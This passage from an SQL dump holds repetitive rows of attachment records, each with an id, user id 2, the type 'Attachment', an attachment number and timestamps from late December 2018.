19:34:24',NULL),(14461,2,'Attachment',416,'2018-12-26 19:34:25','2018-12-26 19:34:25',NULL),(14462,2,'Attachment',397,'2018-12-26 19:34:25','2018-12-26 19:34:25',NULL),(14463,2,'Attachment',382,'2018-12-26 19:34:25','2018-12-26 19:34:25',NULL),(14464,2,'Attachment',403,'2018-12-26 19:34:25','2018-12-26 19:34:25',NULL),(14465,2,'Attachment',421,'2018-12-26 19:34:25','2018-12-26 19:34:25',NULL),(14466,2,'Attachment',385,'2018-12-26 20:21:31','2018-12-26 20:21:31',NULL),(14467,2,'Attachment',403,'2018-12-26 20:21:32','2018-12-26 20:21:32',NULL),(14468,2,'Attachment',416,'2018-12-26 20:21:32','2018-12-26 20:21:32',NULL),(14469,2,'Attachment',419,'2018-12-26 20:21:32','2018-12-26 20:21:32',NULL),(14470,2,'Attachment',397,'2018-12-26 20:21:32','2018-12-26 20:21:32',NULL),(14471,2,'Attachment',382,'2018-12-26 20:21:32','2018-12-26 20:21:32',NULL),(14472,2,'Attachment',421,'2018-12-26 20:21:32','2018-12-26 20:21:32',NULL),(14473,2,'Attachment',403,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14474,2,'Attachment',397,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14475,2,'Attachment',382,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14476,2,'Attachment',416,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14477,2,'Attachment',419,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14478,2,'Attachment',385,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14479,2,'Attachment',421,'2018-12-26 21:27:41','2018-12-26 21:27:41',NULL),(14480,2,'Attachment',403,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14481,2,'Attachment',419,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14482,2,'Attachment',385,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14483,2,'Attachment',416,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14484,2,'Attachment',397,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14485,2,'Attachment',382,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14486,2,'Attachment',421,'2018-12-26 23:03:03','2018-12-26 23:03:03',NULL),(14487,2,'Attachment',365,'2018-12-26 23:39:32','2018-12-26 23:39:32',NULL),(14488,2,'Attachment',416,'2018-12-27 01:02:47','2018-12-27 01:02:47',NULL),(14489,2,'Attachment',382,'2018-12-27 01:02:47','2018-12-27 01:02:47',NULL),(14490,2,'Attachment',397,'2018-12-27 01:02:47','2018-12-27 01:02:47',NULL),(14491,2,'Attachment',419,'2018-12-27 01:02:47','2018-12-27 01:02:47',NULL),(14492,2,'Attachment',403,'2018-12-27 01:02:47','2018-12-27 01:02:47',NULL),(14493,2,'Attachment',385,'2018-12-27 01:02:48','2018-12-27 01:02:48',NULL),(14494,2,'Attachment',421,'2018-12-27 01:02:48','2018-12-27 01:02:48',NULL),(14495,2,'Attachment',419,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14496,2,'Attachment',397,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14497,2,'Attachment',416,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14498,2,'Attachment',382,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14499,2,'Attachment',403,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14500,2,'Attachment',385,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14501,2,'Attachment',421,'2018-12-27 01:53:39','2018-12-27 01:53:39',NULL),(14502,2,'Attachment',385,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14503,2,'Attachment',403,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14504,2,'Attachment',416,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14505,2,'Attachment',419,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14506,2,'Attachment',397,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14507,2,'Attachment',382,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14508,2,'Attachment',421,'2018-12-27 03:18:15','2018-12-27 03:18:15',NULL),(14509,2,'Attachment',397,'2018-12-27 04:28:25','2018-12-27 04:28:25',NULL),(14510,2,'Attachment',403,'2018-12-27 04:28:25','2018-12-27 04:28:25',NULL),(14511,2,'Attachment',419,'2018-12-27 04:28:25','2018-12-27 04:28:25',NULL),(14512,2,'Attachment',382,'2018-12-27 04:28:25','2018-12-27 04:28:25',NULL),(14513,2,'Attachment',416,'2018-12-27 04:28:25','2018-12-27 04:28:25',NULL),(14514,2,'Attachment',385,'2018-12-27 04:28:25','2018-12-27 04:28:25',NULL),(14515,2,'Attachment',421,'2018-12-27 04:28:26','2018-12-27 04:28:26',NULL),(14516,2,'Attachment',296,'2018-12-27 05:56:20','2018-12-27 05:56:20',NULL),(14517,2,'Attachment',419,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14518,2,'Attachment',416,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14519,2,'Attachment',382,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14520,2,'Attachment',403,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14521,2,'Attachment',397,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14522,2,'Attachment',385,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14523,2,'Attachment',421,'2018-12-27 06:11:36','2018-12-27 06:11:36',NULL),(14524,2,'Attachment',397,'2018-12-27 07:09:25','2018-12-27 07:09:25',NULL),(14525,2,'Attachment',403,'2018-12-27 07:09:25','2018-12-27 07:09:25',NULL),(14526,2,'Attachment',382,'2018-12-27 07:09:25','2018-12-27 07:09:25',NULL),(14527,2,'Attachment',416,'2018-12-27 07:09:25','2018-12-27 07:09:25',NULL),(14528,2,'Attachment',419,'2018-12-27 07:09:25','2018-12-27 07:09:25',NULL),(14529,2,'Attachment',385,'2018-12-27 07:09:26','2018-12-27 07:09:26',NULL),(14530,2,'Attachment',421,'2018-12-27 07:09:26','2018-12-27 07:09:26',NULL),(14531,2,'Attachment',385,'2018-12-27 07:54:40','2018-12-27 07:54:40',NULL),(14532,2,'Attachment',419,'2018-12-27 07:54:41','2018-12-27 07:54:41',NULL),(14533,2,'Attachment',416,'2018-12-27 07:54:42','2018-12-27 07:54:42',NULL),(14534,2,'Attachment',403,'2018-12-27 07:54:43','2018-12-27 07:54:43',NULL),(14535,2,'Attachment',397,'2018-12-27 07:54:43','2018-12-27 07:54:43',NULL),(14536,2,'Attachment',382,'2018-12-27 07:54:45','2018-12-27 07:54:45',NULL),(14537,2,'Attachment',421,'2018-12-27 07:54:47','2018-12-27 07:54:47',NULL),(14538,2,'Attachment',385,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14539,2,'Attachment',419,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14540,2,'Attachment',416,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14541,2,'Attachment',403,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14542,2,'Attachment',397,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14543,2,'Attachment',421,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14544,2,'Attachment',382,'2018-12-27 08:53:23','2018-12-27 08:53:23',NULL),(14545,2,'Attachment',382,'2018-12-27 08:53:47','2018-12-27 08:53:47',NULL),(14546,2,'Attachment',416,'2018-12-27 08:53:47','2018-12-27 08:53:47',NULL),(14547,2,'Attachment',403,'2018-12-27 08:53:47','2018-12-27 08:53:47',NULL),(14548,2,'Attachment',397,'2018-12-27 08:53:47','2018-12-27 08:53:47',NULL),(14549,2,'Attachment',419,'2018-12-27 08:53:47','2018-12-27 08:53:47',NULL),(14550,2,'Attachment',385,'2018-12-27 08:53:47','2018-12-27 08:53:47',NULL),(14551,2,'Attachment',421,'2018-12-27 08:53:48','2018-12-27 08:53:48',NULL),(14552,2,'Attachment',385,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14553,2,'Attachment',416,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14554,2,'Attachment',419,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14555,2,'Attachment',397,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14556,2,'Attachment',382,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14557,2,'Attachment',403,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14558,2,'Attachment',421,'2018-12-27 09:56:45','2018-12-27 09:56:45',NULL),(14559,2,'Attachment',416,'2018-12-27 10:20:23','2018-12-27 10:20:23',NULL),(14560,2,'Attachment',397,'2018-12-27 10:20:23','2018-12-27 10:20:23',NULL),(14561,2,'Attachment',382,'2018-12-27 10:20:23','2018-12-27 10:20:23',NULL),(14562,2,'Attachment',403,'2018-12-27 10:20:23','2018-12-27 10:20:23',NULL),(14563,2,'Attachment',419,'2018-12-27 10:20:23','2018-12-27 10:20:23',NULL),(14564,2,'Attachment',385,'2018-12-27 10:20:24','2018-12-27 10:20:24',NULL),(14565,2,'Attachment',421,'2018-12-27 10:20:24','2018-12-27 10:20:24',NULL),(14566,2,'Attachment',296,'2018-12-27 13:11:41','2018-12-27 13:11:41',NULL),(14567,2,'Attachment',397,'2018-12-27 13:24:04','2018-12-27 13:24:04',NULL),(14568,2,'Attachment',397,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14569,2,'Attachment',382,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14570,2,'Attachment',403,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14571,2,'Attachment',416,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14572,2,'Attachment',419,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14573,2,'Attachment',385,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14574,2,'Attachment',421,'2018-12-27 14:27:10','2018-12-27 14:27:10',NULL),(14575,2,'Attachment',296,'2018-12-27 15:19:32','2018-12-27 15:19:32',NULL),(14576,2,'Attachment',379,'2018-12-27 15:54:27','2018-12-27 15:54:27',NULL),(14577,2,'Attachment',385,'2018-12-27 18:07:35','2018-12-27 18:07:35',NULL),(14578,2,'Attachment',385,'2018-12-27 18:07:35','2018-12-27 18:07:35',NULL),(14579,2,'Attachment',385,'2018-12-27 18:07:35','2018-12-27 18:07:35',NULL),(14580,2,'Attachment',419,'2018-12-27 18:07:36','2018-12-27 18:07:36',NULL),(14581,2,'Attachment',416,'2018-12-27 18:07:36','2018-12-27 18:07:36',NULL),(14582,2,'Attachment',419,'2018-12-27 18:07:36','2018-12-27 18:07:36',NULL),(14583,2,'Attachment',421,'2018-12-27 18:07:36','2018-12-27 18:07:36',NULL),(14584,2,'Attachment',416,'2018-12-27 18:07:36','2018-12-27 18:07:36',NULL),(14585,2,'Attachment',421,'2018-12-27 18:07:37','2018-12-27 18:07:37',NULL),(14586,2,'Attachment',403,'2018-12-27 18:07:38','2018-12-27 18:07:38',NULL),(14587,2,'Attachment',382,'2018-12-27 18:07:38','2018-12-27 18:07:38',NULL),(14588,2,'Attachment',403,'2018-12-27 18:07:38','2018-12-27 18:07:38',NULL),(14589,2,'Attachment',382,'2018-12-27 18:07:38','2018-12-27 18:07:38',NULL),(14590,2,'Attachment',397,'2018-12-27 18:07:38','2018-12-27 18:07:38',NULL),(14591,2,'Attachment',397,'2018-12-27 18:07:38','2018-12-27 18:07:38',NULL),(14592,2,'Attachment',419,'2018-12-27 19:21:19','2018-12-27 19:21:19',NULL),(14593,2,'Attachment',397,'2018-12-27 19:21:19','2018-12-27 19:21:19',NULL),(14594,2,'Attachment',416,'2018-12-27 19:21:19','2018-12-27 19:21:19',NULL),(14595,2,'Attachment',403,'2018-12-27 19:21:19','2018-12-27 19:21:19',NULL),(14596,2,'Attachment',382,'2018-12-27 19:21:19','2018-12-27 19:21:19',NULL),(14597,2,'Attachment',385,'2018-12-27 19:21:19','2018-12-27 19:21:19',NULL),(14598,2,'Attachment',421,'2018-12-27 19:21:20','2018-12-27 19:21:20',NULL),(14599,2,'Attachment',403,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14600,2,'Attachment',419,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14601,2,'Attachment',416,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14602,2,'Attachment',382,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14603,2,'Attachment',397,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14604,2,'Attachment',385,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14605,2,'Attachment',421,'2018-12-27 20:40:19','2018-12-27 20:40:19',NULL),(14606,2,'Attachment',419,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14607,2,'Attachment',403,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14608,2,'Attachment',416,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14609,2,'Attachment',382,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14610,2,'Attachment',397,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14611,2,'Attachment',385,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14612,2,'Attachment',421,'2018-12-27 22:20:40','2018-12-27 22:20:40',NULL),(14613,2,'Attachment',385,'2018-12-27 22:32:12','2018-12-27 22:32:12',NULL),(14614,2,'Attachment',419,'2018-12-27 22:32:13','2018-12-27 22:32:13',NULL),(14615,2,'Attachment',416,'2018-12-27 22:32:13','2018-12-27 22:32:13',NULL),(14616,2,'Attachment',403,'2018-12-27 22:32:13','2018-12-27 22:32:13',NULL),(14617,2,'Attachment',397,'2018-12-27 22:32:13','2018-12-27 22:32:13',NULL),(14618,2,'Attachment',382,'2018-12-27 22:32:13','2018-12-27 22:32:13',NULL),(14619,2,'Attachment',421,'2018-12-27 22:32:13','2018-12-27 22:32:13',NULL),(14620,2,'Attachment',403,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14621,2,'Attachment',419,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14622,2,'Attachment',382,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14623,2,'Attachment',397,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14624,2,'Attachment',416,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14625,2,'Attachment',385,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14626,2,'Attachment',421,'2018-12-28 00:14:52','2018-12-28 00:14:52',NULL),(14627,2,'Attachment',403,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14628,2,'Attachment',382,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14629,2,'Attachment',397,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14630,2,'Attachment',416,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14631,2,'Attachment',419,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14632,2,'Attachment',385,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14633,2,'Attachment',421,'2018-12-28 00:34:19','2018-12-28 00:34:19',NULL),(14634,2,'Attachment',397,'2018-12-28 00:34:24','2018-12-28 00:34:24',NULL),(14635,2,'Attachment',296,'2018-12-28 00:43:00','2018-12-28 00:43:00',NULL),(14636,2,'Attachment',403,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14637,2,'Attachment',419,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14638,2,'Attachment',382,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14639,2,'Attachment',397,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14640,2,'Attachment',416,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14641,2,'Attachment',385,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14642,2,'Attachment',421,'2018-12-28 01:42:07','2018-12-28 01:42:07',NULL),(14643,2,'Attachment',403,'2018-12-28 03:14:35','2018-12-28 03:14:35',NULL),(14644,2,'Attachment',419,'2018-12-28 03:14:35','2018-12-28 03:14:35',NULL),(14645,2,'Attachment',416,'2018-12-28 03:14:35','2018-12-28 03:14:35',NULL),(14646,2,'Attachment',397,'2018-12-28 03:14:35','2018-12-28 03:14:35',NULL),(14647,2,'Attachment',385,'2018-12-28 03:14:35','2018-12-28 03:14:35',NULL),(14648,2,'Attachment',382,'2018-12-28 03:14:36','2018-12-28 03:14:36',NULL),(14649,2,'Attachment',421,'2018-12-28 03:14:36','2018-12-28 03:14:36',NULL),(14650,2,'Attachment',419,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14651,2,'Attachment',385,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14652,2,'Attachment',416,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14653,2,'Attachment',403,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14654,2,'Attachment',397,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14655,2,'Attachment',421,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14656,2,'Attachment',382,'2018-12-28 04:08:43','2018-12-28 04:08:43',NULL),(14657,2,'Attachment',385,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14658,2,'Attachment',419,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14659,2,'Attachment',416,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14660,2,'Attachment',397,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14661,2,'Attachment',403,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14662,2,'Attachment',421,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14663,2,'Attachment',382,'2018-12-28 06:46:48','2018-12-28 06:46:48',NULL),(14664,2,'Attachment',419,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14665,2,'Attachment',403,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14666,2,'Attachment',382,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14667,2,'Attachment',416,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14668,2,'Attachment',397,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14669,2,'Attachment',385,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14670,2,'Attachment',421,'2018-12-28 07:08:49','2018-12-28 07:08:49',NULL),(14671,2,'Attachment',419,'2018-12-28 07:08:50','2018-12-28 07:08:50',NULL),(14672,2,'Attachment',403,'2018-12-28 07:08:50','2018-12-28 07:08:50',NULL),(14673,2,'Attachment',382,'2018-12-28 07:08:50','2018-12-28 07:08:50',NULL),(14674,2,'Attachment',397,'2018-12-28 07:08:50','2018-12-28 07:08:50',NULL),(14675,2,'Attachment',416,'2018-12-28 07:08:50','2018-12-28 07:08:50',NULL),(14676,2,'Attachment',385,'2018-12-28 07:08:50','2018-12-28 07:08:50',NULL),(14677,2,'Attachment',421,'2018-12-28 07:08:51','2018-12-28 07:08:51',NULL),(14678,2,'Attachment',403,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14679,2,'Attachment',382,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14680,2,'Attachment',419,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14681,2,'Attachment',397,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14682,2,'Attachment',416,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14683,2,'Attachment',385,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14684,2,'Attachment',421,'2018-12-28 07:45:48','2018-12-28 07:45:48',NULL),(14685,2,'Attachment',403,'2018-12-28 09:26:06','2018-12-28 09:26:06',NULL),(14686,2,'Attachment',416,'2018-12-28 09:26:06','2018-12-28 09:26:06',NULL),(14687,2,'Attachment',397,'2018-12-28 09:26:06','2018-12-28 09:26:06',NULL),(14688,2,'Attachment',382,'2018-12-28 09:26:06','2018-12-28 09:26:06',NULL),(14689,2,'Attachment',419,'2018-12-28 09:26:06','2018-12-28 09:26:06',NULL),(14690,2,'Attachment',385,'2018-12-28 09:26:07','2018-12-28 09:26:07',NULL),(14691,2,'Attachment',421,'2018-12-28 09:26:07','2018-12-28 09:26:07',NULL),(14692,2,'Attachment',416,'2018-12-28 11:22:58','2018-12-28 11:22:58',NULL),(14693,2,'Attachment',416,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14694,2,'Attachment',397,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14695,2,'Attachment',385,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14696,2,'Attachment',403,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14697,2,'Attachment',419,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14698,2,'Attachment',382,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14699,2,'Attachment',421,'2018-12-28 12:52:54','2018-12-28 12:52:54',NULL),(14700,2,'Attachment',385,'2018-12-28 13:57:33','2018-12-28 13:57:33',NULL),(14701,2,'Attachment',416,'2018-12-28 13:57:34','2018-12-28 13:57:34',NULL),(14702,2,'Attachment',403,'2018-12-28 13:57:34','2018-12-28 13:57:34',NULL),(14703,2,'Attachment',397,'2018-12-28 13:57:34','2018-12-28 13:57:34',NULL),(14704,2,'Attachment',382,'2018-12-28 13:57:34','2018-12-28 13:57:34',NULL),(14705,2,'Attachment',419,'2018-12-28 13:57:34','2018-12-28 13:57:34',NULL),(14706,2,'Attachment',421,'2018-12-28 13:57:34','2018-12-28 13:57:34',NULL),(14707,2,'Attachment',419,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14708,2,'Attachment',403,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14709,2,'Attachment',397,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14710,2,'Attachment',382,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14711,2,'Attachment',416,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14712,2,'Attachment',385,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14713,2,'Attachment',421,'2018-12-28 15:59:57','2018-12-28 15:59:57',NULL),(14714,2,'Attachment',382,'2018-12-28 16:21:07','2018-12-28 16:21:07',NULL),(14715,2,'Attachment',385,'2018-12-28 16:21:09','2018-12-28 16:21:09',NULL),(14716,2,'Attachment',416,'2018-12-28 16:30:08','2018-12-28 16:30:08',NULL),(14717,2,'Attachment',397,'2018-12-28 16:30:09','2018-12-28 16:30:09',NULL),(14718,2,'Attachment',385,'2018-12-28 17:07:07','2018-12-28 17:07:07',NULL),(14719,2,'Attachment',382,'2018-12-28 17:07:07','2018-12-28 17:07:07',NULL),(14720,2,'Attachment',397,'2018-12-28 17:07:07','2018-12-28 17:07:07',NULL),(14721,2,'Attachment',416,'2018-12-28 17:07:07','2018-12-28 17:07:07',NULL),(14722,2,'Attachment',403,'2018-12-28 17:07:07','2018-12-28 17:07:07',NULL),(14723,2,'Attachment',419,'2018-12-28 17:07:07','2018-12-28 17:07:07',NULL),(14724,2,'Attachment',421,'2018-12-28 17:07:08','2018-12-28 17:07:08',NULL),(14725,2,'Attachment',344,'2018-12-28 17:07:10','2018-12-28 17:07:10',NULL),(14726,2,'Attachment',365,'2018-12-28 17:07:10','2018-12-28 17:07:10',NULL),(14727,2,'Attachment',354,'2018-12-28 17:07:10','2018-12-28 17:07:10',NULL),(14728,2,'Attachment',341,'2018-12-28 17:07:10','2018-12-28 17:07:10',NULL),(14729,2,'Attachment',363,'2018-12-28 17:07:10','2018-12-28 17:07:10',NULL),(14730,2,'Attachment',335,'2018-12-28 17:07:10','2018-12-28 17:07:10',NULL),(14731,2,'Attachment',252,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14732,2,'Attachment',266,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14733,2,'Attachment',221,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14734,2,'Attachment',288,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14735,2,'Attachment',218,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14736,2,'Attachment',202,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14737,2,'Attachment',294,'2018-12-28 17:07:12','2018-12-28 17:07:12',NULL),(14738,2,'Attachment',403,'2018-12-28 17:17:29','2018-12-28 17:17:29',NULL),(14739,2,'Attachment',421,'2018-12-28 17:17:30','2018-12-28 17:17:30',NULL),(14740,2,'Attachment',419,'2018-12-28 17:30:56','2018-12-28 17:30:56',NULL),(14741,2,'Attachment',403,'2018-12-28 17:30:56','2018-12-28 17:30:56',NULL),(14742,2,'Attachment',416,'2018-12-28 17:30:56','2018-12-28 17:30:56',NULL),(14743,2,'Attachment',397,'2018-12-28 17:30:56','2018-12-28 17:30:56',NULL),(14744,2,'Attachment',385,'2018-12-28 17:30:56','2018-12-28 17:30:56',NULL),(14745,2,'Attachment',382,'2018-12-28 17:30:56','2018-12-28 17:30:56',NULL),(14746,2,'Attachment',421,'2018-12-28 17:30:57','2018-12-28 17:30:57',NULL),(14747,2,'Attachment',382,'2018-12-28 19:02:33','2018-12-28 19:02:33',NULL),(14748,2,'Attachment',385,'2018-12-28 19:02:33','2018-12-28 19:02:33',NULL),(14749,2,'Attachment',403,'2018-12-28 19:02:33','2018-12-28 19:02:33',NULL),(14750,2,'Attachment',397,'2018-12-28 19:02:33','2018-12-28 19:02:33',NULL),(14751,2,'Attachment',419,'2018-12-28 19:02:33','2018-12-28 19:02:33',NULL),(14752,2,'Attachment',416,'2018-12-28 19:02:33','2018-12-28 19:02:33',NULL),(14753,2,'Attachment',421,'2018-12-28 19:02:34','2018-12-28 19:02:34',NULL),(14754,2,'Attachment',419,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14755,2,'Attachment',385,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14756,2,'Attachment',416,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14757,2,'Attachment',403,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14758,2,'Attachment',382,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14759,2,'Attachment',397,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14760,2,'Attachment',421,'2018-12-28 19:59:47','2018-12-28 19:59:47',NULL),(14761,2,'Attachment',385,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14762,2,'Attachment',419,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14763,2,'Attachment',397,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14764,2,'Attachment',403,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14765,2,'Attachment',416,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14766,2,'Attachment',382,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14767,2,'Attachment',421,'2018-12-28 22:19:12','2018-12-28 22:19:12',NULL),(14768,2,'Attachment',328,'2018-12-29 02:09:02','2018-12-29 02:09:02',NULL),(14769,2,'Attachment',385,'2018-12-29 02:52:46','2018-12-29 02:52:46',NULL),(14770,2,'Attachment',419,'2018-12-29 02:52:46','2018-12-29 02:52:46',NULL),(14771,2,'Attachment',403,'2018-12-29 02:52:46','2018-12-29 02:52:46',NULL),(14772,2,'Attachment',397,'2018-12-29 02:52:46','2018-12-29 02:52:46',NULL),(14773,2,'Attachment',382,'2018-12-29 02:52:46','2018-12-29 02:52:46',NULL),(14774,2,'Attachment',416,'2018-12-29 02:52:46','2018-12-29 02:52:46',NULL),(14775,2,'Attachment',421,'2018-12-29 02:52:47','2018-12-29 02:52:47',NULL),(14776,2,'Attachment',419,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14777,2,'Attachment',385,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14778,2,'Attachment',403,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14779,2,'Attachment',382,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14780,2,'Attachment',416,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14781,2,'Attachment',397,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14782,2,'Attachment',421,'2018-12-29 04:21:43','2018-12-29 04:21:43',NULL),(14783,2,'Attachment',385,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14784,2,'Attachment',419,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14785,2,'Attachment',416,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14786,2,'Attachment',382,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14787,2,'Attachment',403,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14788,2,'Attachment',397,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14789,2,'Attachment',421,'2018-12-29 08:12:57','2018-12-29 08:12:57',NULL),(14790,2,'Attachment',419,'2018-12-29 08:57:53','2018-12-29 08:57:53',NULL),(14791,2,'Attachment',385,'2018-12-29 08:57:53','2018-12-29 08:57:53',NULL),(14792,2,'Attachment',397,'2018-12-29 08:57:53','2018-12-29 08:57:53',NULL),(14793,2,'Attachment',416,'2018-12-29 08:57:53','2018-12-29 